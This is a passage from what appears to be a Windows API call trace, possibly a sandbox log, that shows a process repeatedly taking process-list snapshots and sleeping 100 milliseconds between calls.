th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.033] Sleep (dwMilliseconds=0x64) [0212.047] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0212.058] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.162] Sleep (dwMilliseconds=0x64) [0212.168] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0212.181] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.282] Sleep (dwMilliseconds=0x64) [0212.296] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0212.306] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.380] Sleep (dwMilliseconds=0x64) [0212.388] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0212.409] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.480] Sleep (dwMilliseconds=0x64) [0212.500] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0212.510] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.584] Sleep (dwMilliseconds=0x64) [0212.591] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0212.604] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.692] Sleep (dwMilliseconds=0x64) [0212.704] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0212.721] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.806] Sleep (dwMilliseconds=0x64) [0212.887] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0212.899] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.135] Sleep (dwMilliseconds=0x64) [0213.233] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0213.258] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.353] Sleep (dwMilliseconds=0x64) [0213.357] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0213.368] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.454] Sleep (dwMilliseconds=0x64) [0213.469] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0213.479] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.572] Sleep (dwMilliseconds=0x64) [0213.578] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0213.595] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.690] Sleep (dwMilliseconds=0x64) [0213.700] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0213.713] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.791] Sleep (dwMilliseconds=0x64) [0213.795] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0213.808] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.879] Sleep (dwMilliseconds=0x64) [0213.887] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0213.899] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.012] Sleep (dwMilliseconds=0x64) [0214.028] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0214.038] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.120] Sleep (dwMilliseconds=0x64) [0214.142] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0214.153] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.229] Sleep (dwMilliseconds=0x64) [0214.234] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0214.244] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.430] Sleep (dwMilliseconds=0x64) [0214.438] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0214.453] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.535] Sleep (dwMilliseconds=0x64) [0214.548] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0214.562] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.636] Sleep (dwMilliseconds=0x64) [0214.657] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0214.673] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.745] Sleep (dwMilliseconds=0x64) [0214.748] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0214.760] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.882] Sleep (dwMilliseconds=0x64) [0214.889] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0214.915] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.019] Sleep (dwMilliseconds=0x64) [0215.067] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0215.082] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.212] Sleep (dwMilliseconds=0x64) [0215.216] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0215.225] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.311] Sleep (dwMilliseconds=0x64) [0215.327] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0215.337] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.411] Sleep (dwMilliseconds=0x64) [0215.426] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0215.446] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.566] Sleep (dwMilliseconds=0x64) [0215.575] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0215.586] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.656] Sleep (dwMilliseconds=0x64) [0215.674] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0215.693] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.805] Sleep (dwMilliseconds=0x64) [0215.809] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0215.822] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.893] Sleep (dwMilliseconds=0x64) [0215.904] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0215.915] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.003] Sleep (dwMilliseconds=0x64) [0216.013] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0216.024] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.085] Sleep (dwMilliseconds=0x64) [0216.091] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0216.101] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.191] Sleep (dwMilliseconds=0x64) [0216.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0216.222] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.288] Sleep (dwMilliseconds=0x64) [0216.294] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0216.304] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.381] Sleep (dwMilliseconds=0x64) [0216.404] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0216.418] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.478] Sleep (dwMilliseconds=0x64) [0216.480] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0216.490] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.546] Sleep (dwMilliseconds=0x64) [0216.560] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0216.569] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.629] Sleep (dwMilliseconds=0x64) [0216.637] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0216.647] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.769] Sleep (dwMilliseconds=0x64) [0216.778] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0216.788] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.845] Sleep (dwMilliseconds=0x64) [0216.857] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0216.867] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.934] Sleep (dwMilliseconds=0x64) [0216.950] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0216.961] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.060] Sleep (dwMilliseconds=0x64) [0217.076] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0217.086] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.158] Sleep (dwMilliseconds=0x64) [0217.177] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0217.192] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.282] Sleep (dwMilliseconds=0x64) [0217.297] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0217.307] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.385] Sleep (dwMilliseconds=0x64) [0217.389] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0217.400] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.478] Sleep (dwMilliseconds=0x64) [0217.481] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0217.490] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.580] Sleep (dwMilliseconds=0x64) [0217.594] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0217.611] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.689] Sleep (dwMilliseconds=0x64) [0217.703] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0217.712] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.792] Sleep (dwMilliseconds=0x64) [0217.812] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0217.829] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.901] Sleep (dwMilliseconds=0x64) [0217.907] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0217.917] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.992] Sleep (dwMilliseconds=0x64) [0217.998] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0218.008] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.166] Sleep (dwMilliseconds=0x64) [0218.235] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0218.251] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.321] Sleep (dwMilliseconds=0x64) [0218.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0218.335] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.400] Sleep (dwMilliseconds=0x64) [0218.402] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0218.413] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.492] Sleep (dwMilliseconds=0x64) [0218.502] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0218.595] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.666] Sleep (dwMilliseconds=0x64) [0218.671] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0218.682] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.752] Sleep (dwMilliseconds=0x64) [0218.765] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0218.776] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.860] Sleep (dwMilliseconds=0x64) [0218.873] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0218.886] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.968] Sleep (dwMilliseconds=0x64) [0218.982] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0218.992] Process32First 